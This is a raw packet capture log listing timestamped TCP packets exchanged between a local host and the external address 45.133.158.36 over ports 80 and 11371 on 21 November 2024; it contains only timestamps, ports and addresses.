Nov 21, 2024 12:20:16.145273924 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.145354986 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.145359993 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.146214962 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.147372007 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.147437096 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.147471905 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.147516966 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.149348974 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.149368048 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.149422884 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.149422884 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.151134968 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.151197910 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.151242018 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.151335001 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.153409958 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.153487921 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.153491974 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.153697014 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.155056000 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.155128002 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.155145884 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.155229092 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.156789064 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.156893969 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.156939983 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.156939983 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.158559084 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.158668041 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.158807039 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.158807039 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.160336971 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.160367966 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.160507917 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.162008047 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.162065029 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.162278891 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.162278891 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.163721085 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.163785934 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.163914919 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.165332079 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.165441990 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.165596962 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.167057037 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.167141914 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.167167902 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.167211056 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.168647051 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.168735027 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.168766022 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.168999910 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.170244932 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.170384884 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.170448065 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.171837091 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.171901941 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.171958923 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.171958923 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.173358917 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.173471928 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.173551083 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.174942970 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.175015926 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.175110102 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.175111055 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.176503897 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.176599026 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.176599026 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.176676989 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.177968979 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.178085089 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.178170919 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.178170919 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.179512024 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.179583073 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.179584980 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.179750919 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.180915117 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.180991888 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.181063890 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.182377100 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.182419062 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.182450056 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.182523966 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.183783054 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.183837891 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.183878899 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.183919907 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.185261011 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.185355902 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.185401917 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.186616898 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.186671972 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.186707020 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.186836958 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.188024998 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.188045979 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.188290119 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.188290119 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.189407110 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.189498901 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.189568043 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.190768003 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.190830946 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.190879107 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.190934896 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.192125082 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.192176104 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.192229033 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.192792892 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.193370104 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.193487883 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.193546057 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.194735050 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.194843054 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.194886923 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.195966959 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.196084023 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.196084976 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.196193933 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.197208881 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.197274923 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.197314978 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.197446108 CET   49826         80          192.168.2.7       45.133.158.36
Nov 21, 2024 12:20:16.198585987 CET   80            49826       45.133.158.36     192.168.2.7
Nov 21, 2024 12:20:16.198704004 CET   49826         80          192.168.2.7       45.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.295020103 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.295049906 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.295213938 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.295514107 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.295586109 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.295593023 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.295671940 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.296402931 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.296458960 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.296525955 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.296654940 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.297466040 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.297512054 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.297661066 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.298398972 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.298461914 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.298481941 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.298512936 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.299489021 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.299518108 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.299537897 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.299565077 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.300445080 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.300503016 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.300550938 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.300719976 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.301422119 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.301503897 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.301666975 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.302349091 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.302432060 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.302479029 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.302479029 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.303303003 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.303421021 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.303436041 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.303734064 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.304296017 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.304441929 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.304512024 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.304512024 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.305232048 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.305349112 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.305553913 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.306143045 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.306231976 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.306252956 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.306289911 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.307137012 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.307202101 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.307228088 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.307280064 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.308059931 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.308104038 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.308131933 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.308207035 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.308952093 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.309036016 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.309111118 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.309839964 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.309945107 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.309978962 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.310067892 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.310800076 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.310854912 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.310866117 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.311094046 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.311682940 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.311697960 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.312199116 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.312199116 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.312567949 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.312697887 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.312761068 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.313450098 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.313483000 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.313540936 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.314367056 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.314388990 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.314481974 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.314481974 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.315201998 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.315335989 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.315531015 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.316082001 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.316142082 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.316175938 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.316409111 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.317078114 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.317154884 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.317205906 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.317833900 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.317939043 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.317996979 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.317996979 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.318694115 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.318717957 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.318737984 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.318773031 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.319510937 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.319610119 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.319674015 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.319674015 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.320338011 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.320389986 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.320465088 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.320524931 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.321190119 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.321300030 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.321567059 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.322052002 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.322124004 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.322196007 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.322278976 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.322899103 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.322999001 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.323019981 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.323061943 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.323699951 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.323860884 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.323884010 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.323964119 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.324534893 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.324645042 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.324718952 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.324812889 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.325403929 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.325515985 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.325588942 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.326248884 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.326318979 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.326339006 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.326443911 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.327065945 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.327174902 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.327198029 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.327248096 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.327939034 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.328052044 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.328073025 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.328263044 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.328789949 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.328892946 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.328912020 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.328963995 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.329626083 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.329668045 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.329687119 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.329706907 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.330430984 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.330542088 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.330569983 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.330606937 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.331281900 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.331331968 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.331409931 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.331650019 CET4982680192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:16.332137108 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:16.332149982 CET804982645.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.696022034 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.696080923 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:21.819963932 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.820069075 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.820132971 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:21.822956085 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.823020935 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.823071003 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:21.828986883 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.829066038 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.829113007 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:21.835016966 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.835087061 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.835129976 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:21.841033936 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.841047049 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.841113091 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:21.847002983 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.847126007 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.847182989 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:21.853027105 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.853133917 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.853190899 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:21.859102011 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.859181881 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.859230042 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:21.865153074 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.865231991 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.865284920 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:21.871117115 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.871274948 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.871336937 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:21.877168894 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.877217054 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.877290010 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:21.883171082 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.883240938 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.883304119 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:21.889173985 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.889254093 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.889307022 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:21.895191908 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:21.895230055 CET113714984045.133.158.36192.168.2.7
